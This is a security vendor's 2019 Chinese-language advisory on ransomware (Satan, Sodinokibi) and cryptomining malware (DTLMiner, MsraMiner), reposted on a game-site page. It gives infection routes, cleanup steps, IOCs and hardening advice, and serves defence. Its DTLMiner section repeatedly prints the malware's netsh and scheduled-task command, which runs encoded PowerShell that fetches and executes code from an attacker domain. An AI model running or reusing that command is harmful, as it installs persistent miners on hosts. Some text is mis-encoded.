當前位置:火影忍者究极风暴世代  > 資訊  > 熱門  > 近期勒索挖礦病毒爆發 安全狗提醒用戶注意防范

火影忍者:近期勒索挖礦病毒爆發 安全狗提醒用戶注意防范

發稿日期:2019-05-28 來源:用戶投稿 億智蘑菇官方微信

火影忍者究极风暴世代 www.bjkkn.icu 防護千萬條,安全第一條;補丁沒打全,中毒兩行淚。

近日,安全狗海青實驗室接到多起客戶中毒求助,經安全研究人員分析,這些病毒感染的途徑90%以上都是“永恒之藍”漏洞和弱口令爆破。

自2017年NSA”武器庫”被黑客組織”影子經紀人”泄露以及WannyCry勒索病毒的爆發,“永恒之藍”就是一個經久不息的話題,直到2019年的今天,還有大量主機因為“永恒之藍”漏洞感染病毒。

2019年4-5月,我們所接觸以及處理的病毒大多利用永恒之藍漏洞進行傳播,而在沒有打過補丁的機器中,往往有多種病毒同時存在,”歷史包袱”嚴重。不僅如此,近期的挖礦木馬和勒索病毒為了對抗殺毒軟件,更是頻繁迭代新版本,為了搶占受害者的”算力市場”,黑客怕是早已進入了”996”。

總的來說,以安全衛道,任重而道遠。

根據近期應急支撐工作總結的情況,我們把遇到的問題主要分為兩大類來討論:勒索病毒和挖礦木馬。

勒索病毒

此次發現的勒索病毒除了利用經典的永恒之藍漏洞和弱口令爆破感染外,還利用多個中間件NDay對互聯網主機進行攻擊。我們在發現病毒后第一時間發出勒索病毒預警:【安全預警】警惕!Satan勒索病毒新變種卷土重來、【高危安全預警】Sodinokibi勒索軟件感染Windows服務器預警

Satan勒索病毒

2019年4月中旬,海青實驗室接到客戶求助,并截獲到Satan勒索病毒最新變種。該變種病毒會針對Windows系統和Linux系統進行無差別攻擊。

Satan病毒在Windows電腦/服務器中,利用永恒之藍漏洞對局域網Windows電腦進行攻擊,同時攻擊??槔肑Boss、Tomcat、Weblogic、Apache Struts2多個組件漏洞以及Tomcat弱口令爆破對Windows、Liunx服務器進行攻擊。病毒攻擊??樵詼閱勘曛骰セ鞒曬?將針對目標操作系統到C2下載勒索病毒主體,并對文件進行加密。目前已有多家企業中招。

病毒攻擊??槎災骰セ鞒曬?判斷目標主機操作系統類型,其次到服務器(111.90.159.106)下載相應病毒主體。Windows系統將病毒文件放在C:\\fast.exe,linux系統病毒主體在/tmp/r.sh。下載成功后執行病毒文件。

病毒執行后將對本地文件加密,并對局域網主機進行橫向感染。勒索信采用中文編寫,看來黑客主要勒索目標是中國用戶。勒索信信息如下圖:

日志溯源:

查看jboss日志,發現從2019-04-xx 02:55:51開始一直有惡意利用jboss漏洞的exp在對中毒機器進行攻擊:

初步分析,最后利用成功的應該是一個jboss反序列化漏洞:

攻擊成功后,上傳jsp文件satan.jsp。該文件如上文:根據系統從c2下載勒索軟件本體并執行

防范措施:

對于勒索病毒,我們只能盡量防范。因為一旦中招,除了支付贖金,能解密的幾率非常小,因此防范和中毒后的處理是重點。

1、及時升級操作系統安全補丁,升級Web、數據庫等服務程序,防止病毒利用漏洞傳播。

2、JBoss、Tomcat、Weblogic、Apache Struts2等服務器組件即時安裝安全補丁,更新到最新版本。

3、服務器、Tomcat等登錄避免使用弱密碼,建議使用“大寫字母+小寫字母+數字+符號”8位以上密碼。

4、定期做好重要數據備份。

IOCs:

111.90.159.106

//111.90.159.106/r.sh

//111.90.159.106/f.exe

fe014fbf44e2b42d70e3effa2248348a

Sodinokibi勒索病毒

該病毒家族最早出現于2019年4月下旬,其傳播和利用手法豐富,短期內版本更新迭代快。目前應急的客戶中,嘉興、瀘州都有中此病毒的案例。

傳播途徑

1).該病毒利用3389弱口令爆破

2). 4月底剛披露的Weblogic遠程代碼執行漏洞CVE-2019-2725并配合其他nday漏洞對Windows服務器發起攻擊

3). cve-2018-8453 Windows內核提權漏洞提升自身權限

4).垃圾郵件傳播

Sodinokibi勒索軟件感染服務器成功后會生成文件加密后綴名+readme.txt的勒索信息,勒索信息包括個人的ID序列號,以及惡意軟件作者的聯系方式。有趣的是最初的曝光者Cisco Talos團隊披露的攻擊者勒索信息開頭顯示的是“Hello Dear friend”,而此處使用的是“Welcome Again”,不排除攻擊者實施攻擊的過程中有二次投遞勒索軟件的行為。

防范措施:

1.Weblogic、Apache Struts2等服務器組件及時安裝安全補丁,更新到最新版本。

2.遠程桌面避免使用弱密碼,建議使用“大寫字母+小寫字母+數字+符號”8位以上密碼。

對重要的數據文件定期進行非本地備份。

IOCs:

MD5:e62c896825a6d186f34fb16b1f57490a

Domain:

//aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion

//decryptor.top

挖礦木馬

死灰復燃的DTLMiner家族挖礦木馬

該家族病毒自”驅動人生”事件后開始活躍。從入侵“驅動人生”植入挖礦病毒升級插件到對自身病毒更新頻率、持久化機制的改變、對抗殺軟的手法來看,我們認為該團伙是一個“滲透經驗豐富”同時具備較強的反偵察能力的職業黑產團伙。

我們來回顧該團伙搞的“大新聞”。

2018年12月14日,“驅動人生”的升級??楸徊環ǚ腫永么ネ誑竽韭聿《?ldquo;DTLMiner”,短期內感染數萬臺計算機。

驅動人生升級推送程序會通過網址鏈接

//pull.update.ackng.com/calendar/PullExecute/F79CB9D2893B254CC75DFB7F3E454A69.exe

將病毒下載到本地執行。

該病毒運行后,將自身釋放到System32(或SysWOW64)目錄下(C:\Windows\SysWOW64\svhost.exe),將該可執行文件注冊為系統服務繼續執行惡意代碼,注冊服務名為Ddriver。

svhost.exe為永恒之藍漏洞攻擊組件,執行之后會對內網具有永恒之藍漏洞和弱口令的主機進行橫向傳播,并從//dl.haqo.net 下載攻擊組件執行。(下載的文件即為該svhost.exe)。此外,該svhost進程還將搜集主機信息,發送到服務器://i.haqo.net/i.png。

除了攻擊、感染、信息搜集外,此時該病毒還未觸發其他惡意行為,初步推測該病毒屬于測試階段。

下面將盤點該DTLMiner家族各版本中對抗殺軟的手法變化,并給予對應的清除方案。

1.1 版本1-文件增肥

病毒采取落地PE文件形式,文件名是隨機的,木馬在生成過程中會在文件末尾填充垃圾數據,生成50M左右的大文件來逃避特征查殺。

該木馬啟動后會在多個系統目錄下釋放增肥的木馬文件,以隨機的方式生成的文件名。

C:\windows;

C:\Users\admin\AppData\Roaming;

C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup;

通過schtasks 創建任務計劃:

schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN <隨機名> /tr “cmd.exe /c C:\Windows\<隨機名>.exe”

通過注冊表啟動項添加開機自啟,并把C:/Users/admin/AppData/Roaming目錄下的增肥木馬當作啟動程序:

HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

清除方案

刪除病毒文件:

C:\Windows\Temp\sartpg.exe

%appdata%\Microsoft\cred.ps1

C:/Windows/隨機名.exe

C:/Users/admin/AppData/Roaming/隨機名.exe

C:/Users/admin/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/隨機名.exe

刪除以下計劃任務:

隨機名

cmd.exe /c C:\Windows\隨機名.exe

刪除菜單啟動項下的病毒文件:

C:\Users\gouchen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\隨機名.exe

刪除注冊表中的惡意啟動項以及操作文件:

HKEY_LOCAL_MACHINE\SOFTWARE\Micrisift\Windows\CurrentVersion\Run

C:/Users/admin/AppData/Roaming/隨機名.exe

1.2 版本2-服務持久化

該版本采用服務進行自身持久化,在漏洞利用成功后,創建隨機名稱的服務

類似客戶這臺機器,被多次感染后創建了多個隨機的病毒服務

服務的可執行文件路徑:

C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

利用服務對自身進行持久化

清除方案

禁用該服務,遍歷任務計劃(不僅僅在\Microsoft\windows\Rass有任務計劃),清除powershell任務計劃

1.3版本3-利用JS腳本執行

在攻擊成功后,病毒在系統啟動項釋放flashplayer快捷方式,并在

%appdata%釋放flashplayer.tmp文件,該文件內容

此文件是一個腳本,使用JS 調用PowerShell腳本下載。下載的??榻餉芎?/p>

分別:設置任務計劃,啟動持久化機制,根據系統版本下載powershell挖礦腳本,下載攻擊腳本進行橫向傳播

清除方案:

%appdata%中的flashplayer.tmp文件

清除啟動項中的快捷方式

遍歷任務計劃,和版本2的方案一樣,刪除powershell任務計劃

1.4 版本4-無文件落地伊始

該版本采用無文件落地形式在系統進行駐留,病毒感染成功后直接創建如下任務計劃

schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

同樣的,這些任務計劃從黑客服務器中下載代碼,并直接執行,傳統的靜態殺毒引擎并不能查殺它。

清除方案:

遍歷任務計劃,清除powershell任務即可

1.5 版本5-任務計劃隱藏

在版本4的基礎上,利用某些windows版本對任務計劃xml文件解析錯誤的bug,用特殊字符命名任務計劃。導致在圖形界面中顯示不了該任務計劃。

清除方案

要清除這些任務計劃,到系統路徑C:\Windows\System32\Tasks或C:\Windows\Tasks中,遍歷這些xml文件,找到powershell任務相關的xml,刪除。

1.6 版本6-未知持久化

個別機子新的變種中,有不明進程啟動powershell,通過查看該powershell參數,確認這個是病毒啟動的。但是這個powershell啟動后,執行自退出,并沒有進一步感染、挖礦、占用CPU。檢查了一些持久化機制(計劃任務、服務、啟動項等沒發現問題)但是定位不到啟動方式。

雖然該powershell啟動后自殺,并沒有執行到惡意代碼部分,但是不能保證后期不會再次爆發。

這個powershell 的父進程是 C:\Windows\svchost.exe,但是svchost.exe是系統的服務進程,系統服務依托了任務計劃 wmi 等多個系統服務,檢查了該PID下依托的服務 都是正常的

用了360處理,發現360沒有對這個進行查殺,但是實時監控powershell啟動的參數,對類似如下參數啟動的powershell進程進行阻斷:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=

可行措施:

通過進程監控,獲取powershell參數,判斷是否為病毒阻止其執行。

1.7整體查殺方案:

對于有二進制文件落地的版本,用云眼查殺;

對于沒有文件落地的版本:

遍歷服務,禁用服務名為隨機字母組成、服務文件路徑特征為

C:\Windows\system32\cmd.exe /C "netsh.exe firewall add portopening tcp 65530 DNS&netsh interface portproxy add v4tov4 listenport=65530 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Rass" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHcAbQA/AGgAZABwACcAKQA=" /F &schtasks /run /tn "\Microsoft\windows\Rass""

的服務

遍歷任務計劃,清除powershell特征的任務

特征如:

啟動次數頻繁(30-60分鐘執行一次)

Powershell 參數如:-ep bypass -e + base64 編碼數據、-hidden 隱藏窗口

用windows自帶的任務計劃圖形界面程序有時候無法獲取完全的任務計劃(如2.3.5),建議使用代碼遍歷任務計劃文件夾C:\Windows\System32\Tasks或C:\Windows\Tasks,通過刪除這些xml文件來清除任務計劃。

清除注冊表

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

刪除以隨機名稱命名、數值數據為:

C:\Windows\System32\config\systemprofile\AppData\Roaming\ + 隨機名稱

的注冊表鍵

對于未知啟動的惡意powershell,通過進程監控,阻斷帶有惡意參數的powershell進程(惡意參數參考2)

IOCs

IP:

27.102.107.137

域名:

p.beahh.com、v.beahh.com、v.y6h.net、down.bddp.net、p.bddp.net、v.bddp.net、p.zer2.com、p.awcna.com、p.amxny.com

2. MsraMiner挖礦家族

該挖礦木馬家族在今年4-5月份也算是比較活躍的,在應急過程中,DZJ、JX、NJ、LZ項目中都有發現中此家族病毒的機器。

該變種利用“永恒之藍”漏洞傳播,在傳播成功后,母體運行后釋放服務???釋放的服務??槊撲婊創?。例如:ApplicationNetBIOSEvent.dll

病毒從以下字符串拼湊:

創建服務:ApplicationNetBIOSEvent(不同的機器不同服務名),下放服務配置文件C:\windows\system32\ApplicationNetBIOSEvent.dll

釋放“永恒之藍”攻擊工具包到C:\Windows\NetworkDistribution或C:\Windows\SpeechsTracing目錄,攻擊內網中的其它機器。

清除方案:

該病毒基于windows服務進行自身持久化,因此首先應禁用服務:

找到服務,服務為隨機拼湊名,但也是有??裳?

服務描述為

Enables a common interface and object model for the $SERVER_NAME$ to access management information about system update, network protocols, devices and applications. If this service is stopped, most Kernel-based software will not function properly. If this service is disabled, any services that depend on it will fail to start.

服務名wmassrv(這是比較老的版本,服務名不隨機)

首先找到該服務,在任務管理器點擊右鍵,轉到進程。記下進程的PID。禁用該服務,停止該服務,結束該進程(剛剛我們記下的進程),結束svchost.exe *32 。刪除或隔離C:\Windows\NetworkDistribution 下所有文件。隔離C:\windows\system32\ApplicationNetBIOSEvent.dll

IOCs:

MD5:

befb60b1240d360ca74c25d3637e165e

95786b6c28bf8dba7bbfeeba9e1ec27a

總結

大部分主機由于沒及時打上補丁和弱口令問題導致機器中毒,進而導致內網橫向傳播,造成大批量感染情況。鑒于勒索病毒、挖礦病毒不斷更新攻擊方法和持久化機制以對抗殺毒軟件,以下提出幾點有效的防范措施:

定期對自身管理的服務器進行安全體檢,并及時更新漏洞補丁和病毒庫。關注安全廠商發布的漏洞預警和病毒預警,對自身資產進行自查。除業務需要服務外,限制其余不必要服務及端口。

使用安全性高的密碼。很多計算機管理人員并沒有意識到自己使用的是弱口令,如密碼帶有設備、個人、單位、部門信息;常用英文單詞(如Password、key、Huawei、admin)等關鍵詞變型;鍵盤規律字符(如qaz、qwe、[email protected]#、147)等等都是弱口令。建議使用大小寫字母+數字+符號八位以上的字符串(最好是無規則)用作密碼。且強烈不建議多臺機器或數據庫使用同一密碼,應做到一機一碼。

建立災備方案。要知道信息安全中,絕對安全是不存在的,對于重要資產應當建立一套完整的災備方案。例如定時做好數據備份,建立備用服務器,做好主備機器切換策略,定期進行災備演練。

限制服務器上的Powershell。黑客經常利用powershell來完成其滲透攻擊,而大部分服務器上承載的業務其實用不到powershell。因此,若業務上用不到powershell組件,建議將其關閉或禁用。

聲明:本文為平臺用戶投稿,不代表億智蘑菇認同其觀點。
8次打賞

二維碼

全部評論(0

Ta的熱門文章

熱門試用更多

66人申請ORICO/奧???SATA3.0固態硬盤 H100 (256GB)

76人申請韶音AS800 AEROPEX 骨傳導藍牙耳機

124人申請AFTERSHOKZ 韶音骨傳導運動播放器

178人申請羅曼沖牙器mini1

476人申請羅曼電動牙刷Smart1

熱門導購更多

¥349羅曼沖牙器mini1

¥459羅曼電動牙刷Smart1

¥699水源器·凈水器V3

¥3980億格瑞A10二代 4K藍光硬盤播放機

¥1888Powerbeats Pro 真無線藍牙運動耳機

26

264